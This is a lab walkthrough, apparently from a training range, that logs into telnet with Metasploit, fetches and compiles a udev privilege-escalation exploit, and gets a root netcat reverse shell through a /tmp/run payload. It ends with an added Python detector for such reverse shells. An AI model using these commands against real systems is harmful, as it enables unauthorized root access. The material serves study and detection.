6-9 vulnerability exploitation telnet login rights lifting
2022-07-19 08:29:00 【Mountain Rabbit 1】
After logging in with a weak password, escalate privileges.

Log in to telnet with msf
In Metasploit, use telnet_login to log in, use sessions -l to list the current sessions, and use sessions -i <id> to connect to the shell.
msfconsole
use auxiliary/scanner/telnet/telnet_login
show options
set username Administrator
set password hacker1961
set rhosts 192.168.42.145
run

At this point we have established a session.
sessions -l
sessions -i 1
ipconfig

At this point we have a shell, and logging in through that shell succeeded.
Connect to the shell from msf and download the exp
Download with wget
wget http://www.exploit-db.com/download/8572
# address of the corresponding exp; download it
I downloaded it locally, set up the corresponding service, and had the range machine fetch the exp from kali via wget.
wget http://www.exploit-db.com/download/8572
ls

Downloading directly produces errors, so we can solve this by building a local http server on kali.
cd /var/www/html
# switch to the web root directory
ls
sudo wget http://www.exploit-db.com/download/8572
# download the exp here
ls
mv 8572 test.c
# rename 8572
ls

cat test.c
# view the file with cat

service apache2 start
# start the apache service

After starting it, we can download the file from the corresponding shell.
ifconfig

Open the corresponding shell
wget "http://192.168.1.105/test.c"

ls

Looking at the current working directory, test.c is there; this is how we obtain the exp.
Set up an nc listener on kali
First set up a listener with nc on kali; otherwise our reverse shell cannot be caught, because as soon as we run the exp it executes the reverse shell.
nc -lvp 4444
# -l listen mode, -v verbose output, -p listening port

With the above, the listener is ready.
Compile and run the exp to get root
gcc <source file> -o exploit
echo '#!/bin/sh' > /tmp/run
echo '/bin/netcat -e /bin/sh <IP address> 4444' >> /tmp/run
ps -edf | grep udev
run exploit with the pid of the root-owned udev process minus 1
./exploit <pid minus 1>
First we need to compile the file we just downloaded into an executable binary named exploit.
gcc test.c -o exploit

At this point there is an error, because the downloaded file ends with a last line that is not part of the source code.
We delete test.c and download it again.
rm test.c

We open a terminal.
gedit /var/www/html/test.c

Delete the last line, then download it again.
wget "http://192.168.1.105/test.c"
ls
rm exploit
gcc test.c -o exploit

At this point we have compiled the exp successfully.
ls -alh

We see that the exp has read, write and execute permissions, so we can use the exp to get a reverse shell.
echo '#!/bin/sh' > /tmp/run

echo '/bin/netcat -e /bin/sh <kali IP address> 4444' >> /tmp/run
# the IP address of kali
cat /tmp/run

ps aux | grep udev
# list the running processes whose command line contains udev

We find a process running with root permission whose process id is 2698.
./exploit 2697

At this point, go back to the listener to check.

On the listening port we find that the connection came back immediately; checking the id shows that it is root.
whoami

We see that the returned shell is root. At this point we have finished this part of the experiment.

The exp we downloaded contains some explanation. First, we need to find a udev process, subtract 1 from its pid, and pass that as the parameter. After compiling, exploit executes the contents of /tmp/run as root; whatever our payload is, it runs with root permission. So, within root permission, we can write something that returns a reverse nc shell, and the returned nc shell has root permission. This also explains the overall usage.
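As an added example (not part of the original post), here is a small Python detector that walks a ps-style process listing and flags the two artefacts this lab leaves on the target: a root shell launched by udevd, and a netcat -e reverse-shell command line. The listing is constructed from the values on this page (the udevd pid 2698 and the listener address 192.168.1.105); the function names and the column layout `pid,ppid,user,args` are my assumptions.

```python
"""Flag reverse-shell command lines and root shells parented by udevd in a
ps-style listing (added example; the sample listing below is constructed)."""
import re

# Sample output in the shape of `ps -eo pid,ppid,user,args` (constructed;
# pid 2698 and 192.168.1.105 are taken from the walkthrough above).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
 2698     1 root     /sbin/udevd --daemon
 2701  2698 root     /bin/sh /tmp/run
 2702  2701 root     /bin/netcat -e /bin/sh 192.168.1.105 4444
 3010  2990 alice    /bin/sh
 3011  3010 alice    vim notes.txt
"""

# netcat/nc/ncat invoked with -e and a shell: the classic reverse-shell shape
REVERSE_SHELL_RE = re.compile(r"\b(?:nc|netcat|ncat)\b.*\s-e\s+/bin/(?:ba)?sh\b")
# command line that is itself a shell interpreter
SHELL_RE = re.compile(r"^(?:/bin/)?(?:ba|da)?sh\b")


def parse_ps(text):
    """Parse `pid ppid user args` rows (header skipped) into dicts."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # tolerate truncated rows
        pid, ppid, user, args = parts
        procs.append({"pid": int(pid), "ppid": int(ppid), "user": user, "args": args})
    return procs


def find_suspicious(procs):
    """Return (pid, reason) pairs for processes worth an analyst's attention."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        if REVERSE_SHELL_RE.search(p["args"]):
            findings.append((p["pid"], "reverse shell command line"))
        parent = by_pid.get(p["ppid"])
        # In this lab the payload script /tmp/run is executed by udevd as root,
        # so a root shell whose parent is udevd is the telltale sign.
        if (parent and p["user"] == "root" and SHELL_RE.match(p["args"])
                and "udevd" in parent["args"]):
            findings.append((p["pid"], "root shell spawned by udevd"))
    return findings


def scan(text):
    """Convenience wrapper: parse a listing and return its findings."""
    return find_suspicious(parse_ps(text))


if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_PS):
        print(f"pid {pid}: {reason}")
```

Run against a live box with `ps -eo pid,ppid,user,args` piped into `scan`; the parent check is what separates this from a plain grep for netcat, since a reverse shell can be renamed but its lineage under a privileged daemon cannot.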